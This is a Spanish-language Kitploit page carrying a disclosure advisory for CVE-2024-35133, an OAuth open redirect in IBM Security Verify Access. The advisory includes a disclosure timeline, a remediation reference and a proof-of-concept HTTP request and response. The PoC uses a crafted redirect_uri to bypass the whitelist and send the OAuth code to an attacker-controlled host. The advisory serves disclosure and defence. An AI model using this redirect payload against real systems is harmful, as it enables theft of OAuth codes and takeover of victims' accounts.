Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133 — Boletín de seguridad para CVE-2024-35133 - Con PoC | Kitploit
Herramientas/GitHubGitHub/ozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133

IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133

Boletín de seguridad para CVE-2024-35133 - Con PoC

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
2hace 1 añoAún no revisado

IBM Security Verify Access - Redirección abierta durante el flujo OAuth (CVE-2024-35133)

Tabla de contenido

  1. Resumen
  2. Descripción detallada
  3. Prueba de concepto
  4. Solución
  5. Cronología de divulgación
  6. Referencias
  7. Créditos
  8. Avisos legales

Resumen

Revisión: 1.0
Impacto:
Al persuadir a una víctima para que visite un sitio web especialmente diseñado, un atacante remoto podría explotar esta vulnerabilidad para suplantar la URL mostrada y redirigir al usuario a un sitio web malicioso. Esto podría permitir al atacante obtener información altamente sensible o llevar a cabo ataques adicionales contra la víctima.

Severidad:

  • NIST: Alta
  • IBM: Media

Puntuación CVSS:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

Proveedor: IBM

Productos afectados:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker

Versiones afectadas: 10.0.0 - 10.0.8

Descripción del producto

IBM Security Verify Access es una solución completa de gestión de políticas de autorización y seguridad de red. Proporciona protección de extremo a extremo de los recursos en intranets y extranets geográficamente dispersas.

Algunas características clave incluyen:

  • Autenticación: Amplia gama de autenticadores integrados y soporte para autenticadores externos.
  • Autorización: Decisiones seguras de permiso y denegación para solicitudes de recursos protegidos.
  • Seguridad de datos y gestión centralizada de recursos: Gestiona el acceso seguro a recursos internos basados en red mediante conectividad pública a Internet a través de un sistema de firewall corporativo.

Descripción detallada

Durante una prueba de penetración del flujo OAuth para un cliente, se descubrió una vulnerabilidad de redirección abierta que permitía la fuga de la variable "code" de OAuth.

Al omitir la lógica del analizador responsable de verificar el parámetro "redirect_uri" durante un flujo OAuth (aprovechando RFC 3986), el atacante podía manipular el filtro de lista blanca de dominios en IBM Security Verify Access. Esto resultaba en una redirección abierta a cualquier dominio arbitrario controlado por el atacante. La víctima podía ser redirigida a un sitio malicioso mientras el dominio parecía ser de confianza.

Esto podría provocar la exposición de información sensible como el token "code" de OAuth o ataques adicionales contra la víctima.


Prueba de concepto

Solicitud

root@kitploit:~
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Respuesta

root@kitploit:~
HTTP/1.1 302 Found 
content-language: en-US 
date: Tue, 19 Mar 2024 16:04:35 GMT 
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
p3p: CP="NON CUR OTPi OUR NOR UNI" 
x-frame-options: DENY 
x-content-type-options: nosniff 
cache-control: no-store 
x-xss-protection: 1; mode=block 
x-permitted-cross-domain-policies: none 
cross-origin-resource-policy: same-site 
content-security-policy: frame-ancestors 'none' 
referrer-policy: no-referrer-when-downgrade 
strict-transport-security: max-age=31536000; includeSubDomains 
pragma: no-cache 
Content-Length: 0.

Solución

Consulte el Boletín de Seguridad de IBM 7166712 para obtener información sobre parches, actualizaciones o soluciones alternativas sugeridas.
Vea Referencias para más detalles.


Cronología de divulgación

  • 19/03/2024: Vulnerabilidad descubierta por el investigador de seguridad (Giulio Garzia)
  • 21/03/2024: Vulnerabilidad compartida con el cliente que utiliza IBM Security Verify Access
  • 02/04/2024: Vulnerabilidad reportada a IBM
  • 14/05/2024: Vulnerabilidad confirmada por IBM
  • 18/07/2024: Parche previo al lanzamiento proporcionado por IBM al cliente
  • 27/08/2024: Boletín de seguridad y vulnerabilidad compartidos por IBM

Referencias

  1. Boletín de seguridad de IBM CVE-2024-35133
  2. Base de datos de vulnerabilidades de IBM X-Force
  3. NIST CVE-2024-35133
  4. CWE-178: Manejo inadecuado de la URL

Créditos

Esta vulnerabilidad fue descubierta y reportada por:

  • Giulio Garzia
    LinkedIn
    GitHub

Avisos legales

Copyright (c) 2024 Giulio Garzia "Ozozuz"

Se concede permiso para la redistribución electrónica de esta alerta. No puede ser editada sin consentimiento escrito explícito. Para obtener permiso para reimprimir esta alerta en otros medios, contacte con el autor.

Descargo de responsabilidad: La información de este aviso es precisa en el momento de su publicación según los datos disponibles. No se ofrecen garantías. Ni el autor ni el editor aceptan responsabilidad por daños directos, indirectos o consecuentes derivados del uso de esta información.

Descargar herramienta